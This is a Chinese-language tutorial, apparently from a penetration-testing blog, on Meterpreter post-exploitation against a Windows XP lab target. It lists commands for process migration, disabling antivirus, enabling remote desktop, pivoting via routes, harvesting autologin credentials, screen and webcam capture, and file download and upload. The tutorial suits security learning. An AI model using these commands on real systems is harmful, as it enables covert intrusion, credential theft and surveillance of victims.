后渗透攻击:信息收集
Metasploit提供了一个非常强大的后渗透工具——Meterpreter,该工具具有多重功能,使后续的渗透入侵变得更容易。
Meterpreter具有以下优势:
1.纯内存工作模式,不需要对磁盘进行任何写入操作。
2.使用加密通信协议,而且可以同时与几个信道通信。
3.在被攻击进程内工作,不需要创建新的进程。
4.易于在多进程之间迁移。
5.平台通用,适用于Windows、Linux、BSD系统,并支持Inter x86和Inter x64平台。
进程迁移
在刚获得Meterpreter shell时,该shell是极其脆弱和易受攻击的,例如攻击者可以利用浏览器漏洞攻陷目标机器,但渗透测试后,浏览器有可能被用户关闭。所以第一步就是要移动这个shell,把他和目标机中某一个稳定的进程绑在一起,而不需要对磁盘进行任何写入操作,这样做使得渗透更难被检测到。
在此我提前利用MS08-067漏洞对win XP 进行渗透并拿到shell,详见:MS08-067 漏洞渗透攻击实践
输入ps命令获取目标机器正在运行的进程
输入getpid命令查看Meterpreter shell的进程号
可以看到Meterpreter shell进程的pid为1096,然后输入migrate1576命令把shell移动到pid为1576的explorer.exe.进程里,因为该进程是一个稳定的应用。
migrate1576
完成进程迁移后,再次输入getpid查看Meterpreter shell的进程号,发现pid为1576,说明已经成功迁移到explorer.exe.进程里
进程迁移完成后,原先的pid为1096的进程会自动关闭,如果没有自动关闭可以输入kill 1096命令关闭该进程。
使用自动迁移命令(run post/windows/manage/migrate)后,系统会自动寻找合适的进程然后迁移。
系统命令
获得了稳定的进程后,接下来收集系统信息。
输入sysinfo命令查看目标机的系统信息,例如操作系统和体系结构
输入run post/windows/gather/checkvm命令检测目标主机是否运行在虚拟机上
输入idletime命令可以查看目标机最近运行的时间
可见目标机正在运行,而且运行了37分钟10秒。
输入route查看目标机完整的网络设置
除此之外,可以输入background命令将当前会话放入后台,适用于有多个Meterpreter会话。
输入getuid命令查看当前目标机器上已经渗透成功的用户名
输入run post/windows/manage/killav 命令关闭目标机系统杀毒软件
输入run post/windows/manage/enable_rdp 命令启动目标机的远程桌面协议,也就是常说的3389端口。
可以看到已经成功启动了远程桌面
输入background将终端隐藏在后台,然后输入route add 命令添加路由,添加成功后输入route print命令查看
可以看到一条地址为192.168.1.0的路由已经被添加到已攻陷主机的路由表中,然后就可以借助被攻陷的主机对其他网络进行攻击。
输入sessions 1连接到shell
输入run post/windows/gather/enum_logged_on_users 命令例举当前有多少用户登录了目标机
可以看见目前只有一个用户登录
输入run post/windows/gather/enum_applications 命令例举安装在目标机上的应用程序
很多用户习惯将计算机设置为自动登录,输入run windows/gather/credentials/windows_autologin命令可以抓取自动登录的用户名和密码。
可以看见没有任何信息。此时就需要用到扩展插件espai,使用前要先输入load espai命令加载该插件
然后输入screengrab命令就可以抓取此时目标机的屏幕截图
查看目标机有没有摄像头输入webcam_list命令
输入webcam_snap命令打开目标机摄像头,拍一张照片(我这里打开失败)
输入webcam_stream命令可以开启直播模式(我在这里也是失败)
在浏览器中打来上面给出的地址
输入shell命令进入目标机shell下面
最后输入exit命令停止Meterpreter会话,该命令还可以用于停止shell会话返回Meterpreter。
文件系统命令
Meterpreter也支持各种文件系统命令,用于搜索文件并执行各种任务,例如搜索文件、下载文件及切换目录等,相对来说操作比较简单。
pwd或者getwd:查看当前处于目标机的哪一个目录
getlwd:查看当前处于本地的哪一个目录
ls:列出当前目录中的所有文件
cd:切换目录
search -f *.txt -d c:\:可以搜索C盘中所有以txt为扩展名的文件,其中-f参数用于指定搜索文件模式,-d参数指定在那个目录下进行搜索
download c:\test.txt/root:下载目标机C盘的test.txt文件到攻击机root下。
upload /root/test.txt c:\:上传攻击机root目录下test.txt文件到目标机C盘下。
适用上述命令搜索已被攻陷的目标机,可以获取得更多关于目标机的信息。
Meterpreter还包含很多文件系统命令,多多尝试。